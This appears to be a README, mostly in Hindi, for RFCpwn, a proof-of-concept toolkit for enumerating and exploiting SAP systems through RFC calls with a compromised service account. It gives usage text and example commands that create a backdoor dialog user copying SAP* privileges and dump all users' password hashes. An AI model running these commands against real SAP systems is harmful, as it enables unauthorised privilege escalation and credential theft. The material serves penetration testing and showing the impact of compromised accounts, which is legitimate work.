
SAP को RFC कॉल का उपयोग करके गणना और शोषण टूलकिट
SAP RFC कॉल्स का उपयोग करके SAP एनुमरेशन और एक्सप्लॉइटेशन टूलकिट
ट्विटर: @icryo
यह एक टूलकिट है जो समझौता किए गए सेवा खातों के प्रभाव को प्रदर्शित करने के लिए है।
यह PoC उत्पादन वातावरण में उपयोग के लिए नहीं है, स्थिरता या समर्थन की कोई गारंटी नहीं है।
RFCpwn pyrfc और SAP द्वारा प्रदान की गई लाइब्रेरीज़ पर निर्भर करता है: https://github.com/SAP/PyRFC#installation
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]
An Impacket style enumeration and exploitation tool using SAP RFC calls
optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
Authentication:
-ip IP <targetName or address>
-u Username RFC Users Username
-p Password RFC Users Password
-c Client Client- eg.000
-s Sysid System Number- eg 00
-ping RFC Ping Command
User Abuse:
-enum Use to enumerate a specific user
-usercopy add a Dialog User
-user USER Required for -usercopy and -userenum to specify the user
-copy COPY User to be copied required for -usercopy
-pw PW password of new user for -usercopy
Hash Collection:
-dump Dump hashes use with below
-exp EXPERIMENTAL - Dump BCODE / PASSCODE hashes
पिंग - कनेक्टिविटी की पुष्टि करें
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping
एक उपयोगकर्ता के अधिकारों को एक नए डायलॉग उपयोगकर्ता में कॉपी करें। यदि -copy निर्दिष्ट नहीं है तो SAP* का उपयोग किया जाता है।
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1
सभी उपयोगकर्ताओं से हैश डंप करें। विकल्प -exp प्रयोगात्मक bcode और passcode हैश के लिए।
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump
